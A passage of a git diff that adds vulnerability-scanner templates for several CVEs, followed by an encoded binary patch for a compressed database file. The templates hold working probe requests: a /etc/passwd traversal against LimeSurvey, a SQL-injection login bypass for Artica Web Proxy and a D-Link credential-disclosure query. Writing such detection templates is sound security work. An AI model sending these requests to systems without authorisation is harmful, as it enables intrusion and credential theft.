Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
new file mode 100644
index 0000000000000000000000000000000000000000..45fff1cbe42ba32570a73eac2d52a439c9eb1002
GIT binary patch
literal 569599
zcmX_n2T;?^7p?T(J0iV>-XSz0bO<#xAp!y_Qbb7nREo6F0!Rxzlu!aeK|w%*f`W#o
zgwTs9O-QgHO_~TV|MzCzOtSOKW+!`h_wK#toZTpPs{f<+u5V%Zns51pU9%?iL#X&e
z@lwA-HF0HbY-Q8N>Hdst)%(}}X_@OEVyp^e+3)}9^Vbm{ggm@5wGq-6!x6=?%f=qx
z@TvsU@YbvZqv<bTtf6s`S|=T;{1uawAl?j@_aZ-XXoxHh-H2AL!mK?H@Kx8DvZ3KQ
zD0*zXkzp#FS7R@yg&imHu#C|q%Oqj^3&dk6+8zIx&ID1I%S{3(4DKIT<W#-+9}|Re
z1QJ}Ep*5YZ)nP8XKf6Y<Cyx}VG_W&sbEdOo((}JFzm%SW;gFuJPu?RD2puFr0rFe0
ziVgz<frbgJ(qT@&mJuS$hlQuQDNn#P8(^K@YS<1`L$%n$%+z8m60orgawtt7KG+4R
zo2|+)Pkl^XOU06OFb^^N7Pg9hluz~cirA%8qON|`5Iowf2X$HZ0Y*C#{{U0Dl@Ddl
ze5hd{)F1fNVqFeW)k-Uvb2nJ*Z>e=b!^2whHeH9S6E$VhI#n#>LD1EL@=PpE*~5^y
z*0Pk_J$ZGzq>>Q#QF?RHV`aBgSw72JB20=SHY~-{g`Q*h13leihRO9rQ~xyULH!;b
z9gX;(76%g<O8=Fo@mn1SircJ5=?E7zKBU+mnhJ}QQ@-&Cb7!EGQA!JpgZmP?*^Mq4
z2mGVc8sc%9Wj2yM3(_XZ{8pTU1lVs7L`@c761`jUnsh8NH$wL%b)?~7|0<qM)lp=m
z0cwBQvR-8(?he#`T@8LW<lAe~LyDJJ&TA5X@^@OAZnlU-#-?Gu8<*DA4j@eg%*1s{
zoN~d2Us_sl;P8FS?^HvM5%-az$+4vOm<gTvT<La8DVB!mRNHorY?Uvgp!Euz&|6YL
z<M3M&W4=)v2PZGfHsJ(NnSg0P)}5jH_&x`;%}8B<ZvS1FC7bT49~eFC8M9b82Q5E8
z6!J;l9^?3U^=6D(+7dYdqoCN%)gV{?)LmJl6E%6#f;6ssX0^4{&0&|Kr<k+o9YXPA
zu%>N(*WF#pU-Rlew-5*Q1wZ30Y<`n%?pA8;mV|N#y+^2A39dlo;vp@~M2#8d;UuY-
z@2FzP$qOSjiFgh&a*_Lc>|}^+N*yyRBzpg(2f%M>mDSi?wp0>2RPM_gNagRjBdaAS
zWKqisfS;!#Eu~T)H#upw1ZTC7f_~J?#Nb#XqC$$rn_2&PB$;E@1PptC%_2Q>*H+pD
z_Ro|9`joo!5qJRroykSvU}Re*=bkTm>z(Jw{&Pvpu@thQG<o+-S%<;K-6fScqjl$u
z>%Cv2r%P(zg@C)11AI~-n>}6;%lfa>Qx>{auYT;Ll`3uMs%EKu-=}9OcDIt0C$Xl@
z!pc7AFMc}<Q7rDffa4y4Xvl6w1?Q8F@MT>Dx6H77Qeo(B1b5QcHrt03i)m>oqiJbO
zb*OTyZAfgjPrjK<7JVAQlZlbumHixvc-6T^N)LYvn!Kmf_qNtk3|yDh7@0C0|MLOk
zXaG`fCW+=oqDEB-l=pNkp(zDN-+WL&;-k2&R9r!-@(Q~&aIsYWauz@Bn*Y1vj;>7S
zz2`^?U6t)H|8{xrp{#M=ji`p)=X_Z$c}C0pv2y&raxA|RCGp^*Ol#{}mVey40i}8O
zWDkt^Z-;6#7c{<js94S&+EB1{N1nUq5>E;<gTFu$yEJ1yT`gLfDT7;bATdPe27<_$
zBYy^W*95I+?Ua=7`exzB8v+je+jVpke}As%_uoBsQrR^9H66aSQ4v?27DDhsOBk`A
zQH?z@UFbt8#8yVG1TtIn<hd~Yb^T@*lFqXMy)o~TS(8N~rnbVWvGd5w<Ec8_%>NQe
z-Lx^H7loPS6)$ywk{$@X40kkG1}EJ?D0-6<0F{pu5LRE^GIX;FIlERa+bw-y!8>9h
zSuWu}<Y{je!rCCM<E|`Djc6xzO+F)%(vPyuzfs4PfwVoYV~ZzTHPM}t>F6!7q1bzT
zQ?5zyX+FMqRP{uS|LUeSlQSK=G&`eg&7}k06)jgpm0;opPC&>;XKE<<&Vi7KgSORi
zwSjJe+-I-_KDQ%e!&Qo@{uA9f63OFN%UccrUBxnUl$8bybKT%hGT`<ph+34Cp7HGm
zJ6Sx8J_Q_~(^{0@B}~=HJ&Z2joNy(wkJY_A@Em}iQU2oBY;OO3a&SDs$iq&^y~`~s
z`YO;TN+Kev>Dx(llP#T7kI<IsqGaH%h=1eN+9&^uQ~8<Obqa;Zx6+!?scup7Jx&fH
z%M`gjpY3=Zg8z-@@AFLO(ssw=H6#shW{n@38X^@5o(^5P3OZBiZgLBl1;0ks`{=ab
z-}}$a)Jy(S7-i_p=kCNl)d3ij;t%4tltWvKqbvVwU5Ap_plD)1=u@3Gfp#9Zv_MIl
zb<I@%or8ILWQ(h%diLW?q=CB?rC!?2U8?cU*r6O4V{<z?m4ZrS@CQF;rq6x+eeBP~
zaRa+$ON!JZB)HY3$mLA1oL@sM54$>X%vaB{ei{;Lt}f&y{_hA>WOG4qqfQ*}s?Q^x
zG!R$lQvxoJy8Rx(2QdNyHiBejr`uav@H*>`s0czej3_kFu@`c7B2jPi+4trCNp+*Q
zPt>XQa*ct>9Wa_0$52(C_H9~a1`L}TcDIt3<rP<5&E^p<_B`V~<7%2@YoIC93b=K@
zNH(Q0eEAMQX5m54-X8_t(W{~fmX&Gd+VLUhOoQta$EN)LitWeX$~2|a;oPk{jJ-rL
zmt+dAA-7AYTr9&>bl}n>ws>O$vE05A9KL(ljPDHSoXt|j=`$c<B@n7L>%{c0tVA-z
zkYeA;FVZ|^e!J?nVMs~_p^P(zrq-TUtOFHkHK2Y&%`_xsc#a&1e567+S)<@wuvyC2
z3KZ)nE=6g`Hm;p<Wg~+CrXeHIkyd;BISJ^9hU1!DUrGC2{+K(7V(?;$M3Zgtwn+&2
z&XRqr*Q5YWDL@TQG9YJZZ-4}5R^>vH=Y66YUJ1mELUw63KunbqAS+XU<}4T{WpJs{
z&D*|6_LOf?Lmd448|LG?7Y6)PBbgun6<J0G^99I@GmF6)mwy_!GP6T1*|S=>-`B1|
zxlX0hH)BZ0%AEIwoiQb&rIO9{nyKMMI`wM-ryQ1*Kg`<x)chixfKW<Xala96T&HVm
z;x6CKZ<D1c`w*^0H=9sfj_>ZDBy<R#xLaoex$m7&S1HIsf11^r%k+|>V%!hK4t&4&
z_nZ5IS)im8y$nkT3R8gP_f@CR&`rhdx)2X)r1)3`6sA(n!7snLXWARi4NazO;oK(+
zEG1${<GliLasu}88G{yFK70JR4V)9Gi>SNxfT<-*ptd(UK}V$vB$zIKU@21@Md}Xu
zW*uRclaf94E+0wK%dmarqr+}(aYH%nzs=}h^oRjmncv+iv440&edmr!^c^p;@|SgW
zXyqqkwjEcUuSIuQDxa$W7x$LUL~U+MW<eV1RSN1Fo*&!1dtv)TFT=$_&c;F9LczT@
zzF{b`>_uIrC%D41$+I@>0^haf0{-i##7W>}vU&129Q#Ny#uuO`HFY&Z?bt0it}Zog
z`cl-vRi(h+4b~mMJCBDa1cuI&g0u@{M$0g}PL*KkpEf+sy~6$d$4Cnqo6DAxe0=OV
z;cum-f?Dbtkd5J2ILtc>TIwWfmmF@aXphbLEb?HBHl>jF4?f2}`Vn%*AG-D4LOobh
zXcZ@Pb#}sEnG-uZfp?>%9#+mbODE(fg{+U`{bV6@=1;o*V1$xuSk0fLNuEN#Yd6`-
zdl>_lo0yAS>{7)le`vc7l9e=@2o@ax;<3~sBM+;i;9`v+TLg8>wNj_S66kfep)#yt
z^09_Nxt6(Gmop~kV&7(hU)OYsEh1$&6=4{M6=*KZq)x4f@S%2YT_hGY#Ls$P=P_Gf
zsdd-zq{Zd8ozwXm{>tJG7^KX`mc-wJgJX=UT~kU+$<PGbaIqh^nCi^vhkXOXsS@K3
z4(TFeptz0i^x1#WVpq%|!Q7eB-`y2ct}Gt<rF%+-?%vLNwWRzgT~AbuBlP!uF`Li!
z>PIK`#Hk`u*D)2%tWnB;6&Z-WC0y;o&|HalinMiVfHqAOD{`qW@SZ~}=F2{Qe(>=R
z!b7(CD<cmJ^FZ<|=h?BOpxQRQjN#50`)-vL$+kp>c>EKj?PSn!in<l3F2LMq=V7}*
zp^y$;Lb0i~XnH2YSmF-ij#h!)T2gj!fj5bfXDG#ze<sBIvL(AT2lr44?Gr`>O?%A`
z3nD!8XR=;~ikXg?3WW+NX+I?Uy|7b6Nd!{cs_6QM<G9#FdkjAR4KT2k4fr-vr1szU
z_sK-(B&B%j&*p=PxhweG0BYM12CEk}fUaAA1!BzP<%MgQ-dcio9gfsgLQ-s7Q4C`b
z&0M@m>eocC$x{3IG#Hp@9&E0y!_LfR=u2@m=MmH)xX~jUnAsMS*Zz8wSjCyMnGqT3
z8ADX#+%;PHZ%Uqeld_TS3Rlew7*rGA$g&xJ&Jw8F0&!WtUyIwAXbR3SwW#YIpDGGr
zmi*jkApCop^^D{F*K!<0LD!#o&|;!Nk3CkMLTIbm_1ZHMJV2z-vS-00&Sss2FR?RX
zuayhZU3%I(D0r!KXl6EWLi19$(dMj=rq-dfZy3!xVE3%grD4HqcE?ie1gCXOL5_+^
z>wlqJlgJ<iMp;HJo$FQfm1XXBwRzf|2Sw4CFl8b+4dJiVsq?SJvMkg8p{av__Jl}A
zpi~w_lP_n4M7VmZ)^CqmG`yWYi#s3s)}`x})tEUrW%=1&IkyQkWoa{2#2vh2sh^jc
zRd(+#`q%mrPp|Etwp@ki9K|XMxD~P)7^O(y^N+$-)Kyg6icz4h`(05M>%rN~b8vDC
zU+LTFrQ^EL%W=LSsjQZw%*T`sP~6ShhIIL}q9qQ_K}c1)#+-B>fY_C^Tf~x{&cbMI
z>7UGVJ^S79sO9?Yl~{ARc7k(9@9_yM;Y6Wl4d75Ml6%oVJn5`+KeUy9ecVy~XutF7
z#6*0YGS2~@$*RMkYrcJJhbMa6V~^y8Ug~mFdn~oghUNR`ZTqf<-&eD8xH!;o;t}#;
zmdsJ=If8&;&(oa{;_L(qIo_@>-rle;!(P^#GRu_-HSwa?I&@Mi!;0jl<S)7zUk5vC
zf5j9rJ9C_egc@q&N<PZoClqSyM!a1EyM4Ya_s}-FEPComx<!BVu8ja0`}-y+QR;dX
zNSknRBITIFPVd?%YN<9hmTK=UR({#GK$tU!&e4B|V8*F)WrFQn;&j2#d_`vct$^V`
z<tOD`(|3XupVSYIEsE+owz1@4wJVir#}lSI4$hp>hB%^44lQ#YHVix7BBWE$(?3x&
zAF8QynuXf65o8e()s1-W&h-`J8U*;W>jlNtUH*cOEZmLo*%Kaw1H8VojV9uc7O}fF
zGxlF}cnj@1$LJvynbM&ZkJ&o8opwlyw#GV@n!P%eN###==<S?S>-(UMu2L+aN=`ej
zgOlEIt!@@YZpuoJ2KcJOf-2r{3JYw(9L;ECX)O=-&b**v*P9#u^uv9Qp%s7U|K^!Z
zrS{QJrG%_5NftyljC5`>=-7gFI2=FwW`<5(t7R=?-D-@BSaiE`+^AO+-X`ExKgj==
z`@Olec>*>s7*O@@)g-*r9ZB&l?>fL2VdaEQ?Wcr7)m8ky8@2JUIND5+kr#dZR<b(r
zQR+vR6{RtEM%LUNEJ0Hu4s{>zZ#x`S^cj3ku$0v~s_3fWaCzV#y0WI?`ng-Z6aMxF
zwVDd*F_S@Ww~#ukAN8-*5?e|lPb&>|Ne7=R<j!&{m9AMy^5a3cF&mPXnvl(MTc^2f
zP*|000gI6%B)pe2<TO>55jeCa9%tD$MU7Ao=^ynty<8dA>v4iz!PUi9VliwuYUW69
zaGJ{f$M_iMX?y^x#9pr9zF(gvqkG=CTC>H>^udTPLi8$?mNTBSp7Nha33J;_J#xdS
zm{?W}IyX&oZ{CuP?ktrR9kA5Nv80B@?-o<G@E}_0iQ|`*!onOpyxu(p$`dR)8j?P)
za#c$C4JF59Q@?io0>3p)PUE{cnwhd!^MCKvl~B&uIOE@W(Om3zb4Xw7;Wh>y8>;VK
z>is4sda*~dGVa1mJ5iEIaWFoRGc4S<cw@PI3dY|szWavSt9Z<nDpA+W+tG2YIgnow
zD&lU($nq=cRNknUF`r56p|s0OOf8;Gw};<yd)ZJ*uh<8n#XGS;?cd`H>HeJ^6w+~v
zoIz-v{m<0pNJ17nWEKJooR&rBF{Pi6E@crJMl0z0x*l}s8O=C3aWmOK_bt7nt3;ya
z1lX)R@F_J%3iHxNx7xDt@#g*ay}<`6W>>WqXnQr)S~Y5f;QBTQS2<<ke5r2#^Yd@)
z(<rtZwzvNZFK0qE>$OQiZv#`qmD6nhME{C!3}k-HzSU?iZt*>}gW!g4U>liCHJgyV
zu_fmqG?~{vU2`(|qNy<KPVwCj!^faSCtkL`yyClXe4YbiPY#0FHeQ^HhjPyZ$sjH6
z&I2uT*Mv@QdFIJuDT+{lnB+kBaDtSrHf3WiU6P+QRZ>V`QUs~0WO>>oheSecYo+;p
z>xlZHrae#K>PMJ)R_f~xve(_Vs#OLk5cu1o4z&0+i{GQRSjqLW<<GHKw0BaN&*PNc
zQdXj0HVD}23-ci)Cb?6M`M;#=Y)T|w)X{O?dnjw>b2=n4a3Ix^c<IIx3z?NUZ*VTj
zz}3P`RG2$8Sg~Fe!jO8<%i+#4)fCys$}Z}fA#+VscWk1Q->v@=VRjT@Uf*_RQ3a9`
zy6`qHctM@i90`A$K;u+vDj$|Mq{A_9YN>2?wQw`?O*mRcbja%dY&q^SM-)7zw}FN}
zk?zrDlA)!|qzq!-J?77sJ9DXA8k)`grwD51ug%5g2WU_MovP;Pgs~+&RcRyouiiPc
z5r<rDGU!bUDVTSHXCu-90*9s6Jdj?LEa+FalQvAE<yQ6BQWwe4%P<fwZySF*z~ImN
zndA=zb6=0z3;yg@7QUYFv*iRd|EYd6%(wh*XUIs<V^Bp}uZVv}7r5BYYVUIl{t$my
z&9*z98e*3!X}p>%kJ}yZbZjf)nP9VIz_LGKWE4!iml!hg$Twm+9LF91bjqyLP0A2N
zE4_-ap|f01mn~qO5Z{1e=KT_fZRJ@8Z`-#$q*`=lHSnfLgX_j6!aF{=<PF6x5Sq1@
zep9N4X05wx&Dg~9s+ppAtrQ2_n|jZ0=@j&`-icI*>_+;#YRq$;6RCTTKXX^g8e8#m
zO*nOStesgr&KOL{j~eEh;A7>?9I~XfbXYLlvp856z1~D?{Wzmo-YzENG36wkGTzyL
zAay!6F5#%NUNZlfLJ;7umCIOs>%yE$eY38s^VdGDm;Q4n5!3-!PF>9K+3G{#JIp_<
z+1JD>sECWPimT{46m5azREP&8=qZ4I(pU#xS)rb$QNM|)9?HdYTfe-glq_MW?W#oR
z=ZfFT)#Br_3n9cOYAAO3#7R&Kv|W;v<JJBn%&ync&=IB~{lC!SkglUiMrxk?^_&|n
zK~-OvuOcq-G=g3w{UsG&Fm79TjrO{a_PVsjzi28M+!y>aS@J_;FJ9$)gOH2VpVhU~
zckfzCx=L&8I{&QhqV9D5!R+hr%%75+f+t8jBvNnL4NW1;s#LiWZ@ddnIUpIia{9)S
z+6wb7N%9eLu#?}1N0^-jCgBT^-MTW=PgPn;X*A%3<fQZg3w>MJniGjo*@-hQwvq%2
z62r^h<Y{)1cohOpJ5O>uPnspGA4d%8M2EzmV_w45OIk~{G(xakPh=+?)^FSL#@D<E
zI1T7Opn)iMZN3VK*&^?~ldw9#NHwhu^`-hPmO)+~aFEigWZh+ZrbmNnfh(7qCe!bV
zW<KXhHHAOUU`#co&VRHzs*yR}G&ol7VA8F~*xE|Wr`9!}g+a`x$BFSf9cQA8fsSRE
z6+wi~L|EWXG=)|}Oq^ewK11WYas;D&EoP~PZ(7ACxJe{W@?)<{uTba;BSHb$o0noq
zi|pl8eFUbfC8nNYgbIc^bJRGvdO0g28`>`B?+71%B`a&N8>jl2dZiQN2uU<qEiRQW
z=D$l``>rGCdqw49!st*TB=AS7kF59E{)>6mYvK26@?@@B3apesm8R9NHCs58jJsLK
zoXc!AY<W@@nk$QvAc>25!vo*A%I_p$c564xU}SzMgA9&p2dmwEN_q+{wN!K#Gqe%;
zIbX78QJJv1++XWMv54R<b9YJa@<_&6Bv`FzNs%~G099H#*F;B&4r)(C)yq`kf525u
zqE-Sj9zL{`B)NI;u)tavdL*g*!47n#wYLOmcD0pNuu+=CSPX70h)1NEJq%W9aL<-V
z(#r@|IbaT8NoBGCT@e<^LR>9Sq`g+oePFrC^DrY&fu0JXav04oAUjqh{+^|*8dXNn
z(+!Z2xskxze++589?h)bz09XL=Gainwr|oDWju$mEt2{`RXTsz{<#6A|Hpf-oDZeX
z!SFUnhkzwccx;b(4hRGtymxX<qz8{L=6MZAM+?8h9-O0wN=7tX=_9rnmNOeT;PiAU
zbmr<VMpCPZYNY>hp<AM92PMzJ)2(?(OP2aYf7MP~-SX(7Q2#d@YiU>k{SI@>Jp-4D
z2@P4cKK{Hk#z_(fpqZl=0doEIMpn=(@N$n-Ek=TwheP$oSEU+*&!g|W#E^LWV(bl)
ziU-4q>fi-O#5+%B>&Hg<FA`NR+)^b+_Dg(?3YD>OT^u}P1rd}+`;g-Bcn$gXP8=-C
zy|N_0mJ2IX1Ud~p$uuf6^T+e~8d;oVw)~RJmwX#BY}|#B$laiOfl@L_jtFqKwF>{G
zGQ*G_5ppKvQ40;dEqfZNoaz?}8I|>5V9dvD4e3uIvlMF5(n1Dbom=24lg>fA^)#3y
zDNR9cQA3CifIoRf8AH05lGLqA>+AMJFaB><)&$xQv@~_jSt<7F69L~Y>lS2UD#wfc
zwA|v^E0rRm6p82jjPk-SUiodO(6D&Ueq}=NeG64!tRMF%s8w0`>k?%(diX0x&Fjm@
z_@^4e;8sp1vAnkX1Cq(GPUF<I%nuXqE=adSzBTGlC1K`lI>z9@WQ_l)nGnm=@am0Z
z4B*d55m5lC&<+>z8P#zpf+_%(KXPjdSO1v)7EAX@B(?=u2s0g?Kft1&lecr*w)nI*
zV4CFmm``Oe`PHm!{GPB^HmO&n*J^9*3Wy>eOT?x;vmyjS)q7x**L$3CZ%*K3!JzFL
zhw6`&4vlfT5Z6weaMolIB3pMvEK93ht`VYaEnML<aTzkX97gOVhzJBt+T9MfW|l(y
z)+9s2b4+e$n;fD;TRXA0Dt<kJJU7|eF#&vu?*Uwo8`}uo0fxDaoz$RS^lu2q{?G)9
zKwu_wwNUZuSQP98`a*XYh0^HzBjyw-E>ZCb5V>9D+*KOvHX>Y?9olxd1jz!Di+%3`
zH>LxBp1{T~!w$=}bN5uY#A1maVKCf~B>X4tk2jp94!+&2n!aN-C|IbZC%2Ar=sT{p
z*%C!WX?4z{)YOK)xkHHZ>se}soAOyI&A^+8ab5o~kgiNHtc859eQRt3{Ryx41v)NK
zQHYz9uef&_{%ILDSL+OH9AcR%_>I@a_}uLQRECYVu*hVSs$uznrWG`-PfsYUT1ySM
z4r8edjy4roM@8!DZn%H-MveOhE151x$NkdH6<^I(9UyD>IFv-S521V~tOSHow5%h4
z5fo(N+QyC-E1m$4OO-oolJo7b-?G%Tjsx9y+8Cww<vd_s9H33kE2AT5n3MTdo1+2Q
z{hs}ws+7rImP*6~IVcx!jD|#l(sO_h&X?lVatlY8$Z?bAk?e*{GLRi}FBf~^<-+lW
zShk)m>4VLmz^x~aotx#`K$hh&=N{&gpfN{$6^c04SP%OSY^pU1R<l=B2oCKjAfgeI
zK>Z*X5qOM7ae){rU&DlC_BX0xe&Yd^79wRvEY<ssP$#PWlWk4t0*KQ>X@NG;zzfy7
zg8I6Io+?6zk21^oLI!7Q5Ycvu)hP~68<RJEKQ&Mthag+X+bkE9?F16`_07{%Fln7H
zM>d-q)FDZj<QKp~9#cW7IF7E_;`eyTILMg(vb&ZZqd*+H>DF&t*QUF8C7fh3R1;0C
zgpHuW9h&DC!<<1wo1rb8TM*FvS6Bj1&k#!c5UQ&%6F!B1d5AXJI>VFEfy9!1f_R*^
z9%V<@>j@yC)n^~;4WsafampNQIop#t%f{!>HX~=fWS>|ry_r(y%{J9)NBl-J4%k@G
zYK2|%Wi_2CHj4Z>7Y&%%V_8My01P&wVeP=n*+@q{h2XF*zzoV%uENb8u#xOc*l;wJ
zt3+`M6yDR4udd)R)m4CKYw5}qf|W+zSTQsvM|EK(vq}Ca2yml3dRG&R&Kj#z&kb+I
zdB-`~V{fInwKUBl!S;=TXt&WV_qZIBVfTu5%?BH@DNefGOXi!+j)avgB#z-m%Kn(X
ze>SU=9Omh9U>vt;f@|l|d{_Y>!BKNY67sX{Xes&o7;py7+Eaela6__i^3j3tX9(#8
zLRyab0ib}*hs7W}c*P=!dQUX5F7yd*a~o=o6KfZ_o)r!xf5ZdJ%3blH`G5sKck2Eh
zn}LCK$)lgq;738tZ70yMT-6OHUF^!<MghM3o|b^GyNh|rcv&d8f3pRMHP(vM(CT~x
z*s|BVt<=6y1IfqDmMV7%Lvl1{YRh+l)nN0vrJ(QTGgYBG_)Ve$gy=Yr4RwA5Y461@
zHD-ZLuuDZ2EMJO(M)B}xnha%cH_l4~KW#*JdK;C50v=#D(PM2V#V-M6(ZllaF`<fk
zntB^h(`8iaY<QFt;0sDqt?3)&rwO4L-Z~G-#xZ-qku8n2u@K$4+R#=Yp>z+sSV$et
z6HPC-W(ALM68<S;8B*1W!596}1Fc1r_kep%e7O<Ec?B|61P9w;rGs0=U|=V#SZrt;
zVJ#UvLJmgrnr>tP=BL9{d&;TtC>scYDIJOR1S&gW=V1bsu`hrXIk*`yt(oGdie<^4
zfI*)GvK>u3Ym^s!!ou`Ai=XROBT1Ee*eb{vZje8$+0knkKe$<bK3$%T)0Ki0;s8Y`
zH$y;Ks9IT|TRWxoRvdTV@O12y2}32|s5ItD=Lmn;m<K{liJXNSjKc>Kr=z#PR^)lu
zAUZhQ9=oI|Cj;3oMUIW>#oLQCpulRtx@^sX<Juu%Da4EZ<CWO)Uh)!**m+nU*77JQ
zq7xt!*NV5Hi29mt1c3*JW)H|<0`6-txDAIM>6-R=R;PSe8VzZ?6|OY9jT?SrLXd>0
zRlr^P0YVV%L4oVd0yE{U!Dw*Haj8!f5bKFjGQ1sXH8_pT!U;6QxH>k8LSE?psVdLK
z9ig&Es{_9XL%>P~jpd`dUYb40uJ#+X$Q&F~uO<U#uMrwXEDBRM#je3xYanBG*juoT
z(!EWv<AaTI?P}Mt4L<wMV(lT6@*EoO1@79gS7NRV8`s>BhLFmla{z;-(Mmm7@8=`@
z!OiB_V)ti&*>+X0r+`@!9_eQHN*vNxo1BfKl*Z%&wwg^I%+%~L&A?h~!&<)vQEgUI
z^BTt|X8{%h_vcHIpA;a^PYOl}o1>WMd`&`mw5y$0>j`{=&vXv$h+Vqgwi%{5Q;*z!
zCI|Z?3i%ih^iuBv&cM8g(6;|(mMY4@z@X6*<=L>4axgyd3mPEefo9dxSAgW;<Qsj)
z%ASruRkx@s3s&_~8(ats8U<p7A!B8Mt(v;NDau-eDt)g=ExDQK@2c2E7{e7vB+#o+
z^Ut&o*rdBQdVAFTcIX(nH2{_iencJWZKWRNba2}fr!m5G@<$I8c#Mofg9&6ML$64D
z`PB6h0xAgEnFR(8PDf+C9lVs45<V5hDYb7j0~tgh&&Uu>t<KUwjtZYoGj1x@5AsbS
zvrIa8W(F<f7~W0N9jlAi%%7Td9W(9F9ZS3rGU8fEs98&TJ1yo&eF~K|NxZ;62?h|k
zR+z+xy+D`fbP|)SgY{;uQnYFS$Kt_)l)<ktyX4nqMhE6rYDa229?^KV16m<xx@k2M
zFA^X$mWTDPQ9ls+WQNkFqszBNX<Nwd&HKOWuVK?E0>f!~%=~-IE-ZvXvXt^k42v|i
z(%cOE-K@6URd=y+S=zcejMQ5$sLeP53ajh(*nAAWY%rmW%Jh=@$_71Z!p^}EWJ8&n
z*(F}HOIfK2DjqfJM2osh?pyD@#7?_kfdnYo7TT(9C?yhycg<>m8J+nhe#)zd0su2w
zX6}D-eAjf&k*CBUmN7PN4mOH?m3XN9UpDHIBEhTwoK`d;-c}G!vn|L4yVjwDWA0N*
z?hi2RH#e7BOQcg&R4at>a2l*gV<u{9YC>4q5uiXQISR35m!qNDpXl-?MPeXPk`Ym>
z+A8Z0p3Bfv?6T%UsAD;#`F!g}-UR~sgx+_%7$>P&`G0H(0W_Z^Z&hF%TD>)d0+p>k
z+fQ^qiq=tLsGrc`<zS5uSV;)Sf+qZ3MZ$ZzMx1zGfhHL988g;B6;I{tT3q0?(v!=n
zL;jeM5r~<n7MJU{yz+D#tN@be+)useuohVE(ox6<R*=<kp5U~lCHOYKhv?Mbpc#R<
zE6O@cos8#y1C(d@*zNJNe?ldG1B6&L7ktw!Xbef~y(k>HuU0VhCWYD}P-c8a`Vsi5
ztn-8;-MSi-#4rNsfbmd2lE6IDaT2;c1u~DazX7Nfj{+64bSBs*M(TZVQjb_0rT%aI
zsO9A>);0sa$3v4y$A_$`HGhYv=xG`5%JS#bWw=ofG&2GLj7jFn)B{?QucDQLOGb#X
z7=Hwx#!d)-j@btbk7#v4UyMy1g(af&ke*dBz?OP0PQ9ol-EX;G<4QfJv8EYYLUsw=
zrg-YOKTmdYkzB=jnFrx0Aw3VNtU%Jx&cocnWej4K5MR&Y#lUSXSL-6&;rS-{?n6aN
z24b_OmW%%&{%4U3s|Ts%PIOapu~>|qMn;qEAXO-auv*I}HSn@CE8NSoC6(P`8DNn#
z*6qU^+RBEouhO$KWzswH>1=`u6=~vyOaEFzu2ygHIp+KhQXZ72WVbBHQ<iF^E1$*>
z??1of%93E!$x`k~Vx&dtdbte>t|N#d;aVW(3TK7S*;*j4v5_G^6u04UZAzr(%v#_W
zVXheUtPwS)`o~ZEWYb+6#I%aiG|b8#V<{Wg{|pW9$_5Y0{ljO8lfxoMj%#6^!S0i{
z;f~f1)UL<onKQ4#05>aOdh-FWmnX3hYk!x%Emv!bcUFY`N!)<YwIM2_(Ck4dS?4-g
z4f(i#MTLir2(Je_4W?~74lv7P?V1Z$BX%EUvA2s{ad&K^I9cB&1_$Tj=c;TN>QGUA
zA~(ac?Ml=~n^q3yR#IFX^(zqeeT15d2}hyJ!Bj*npJG~JMClF8eu{@X^}x3^59^QM
zg^qxd*Fs*fg;LnKND4^=CRmNq8Waga-0M2>3ENif68uuZF+lDU4&vw=3Wg<2XqH6V
z3k1b!TjOi8#z%x3vem2`Mcujk^ed4Q>j+W_yhOYbqD>SD+CM?RBy5&XZDhNdl9wvY
zhrh)}+0QKo7qp0A_WuN<wfYXlP`seIxYk2K*ln&JY<-}cJ%K+<Q|SnGRX!*?a*R;{
z7G-h-SPgo1lFbJ4|GLy`Fb5qo-~5J%Y8Cc!pD?M;!5307U1>OEKtv8b*?%aeR{|LX
zEFfJRDK#mahX1di5(+KG)!5&?M_*%!_}Rd4%|R;1B2j79|7v~%$!Hk0+9#~#e|eg?
zfZ{Qo3#^FHdyu|AHZPd9*U1=!*m;DyA`-6I18sF={34Yy{u$+FnoF8Psh?K3j-H6a
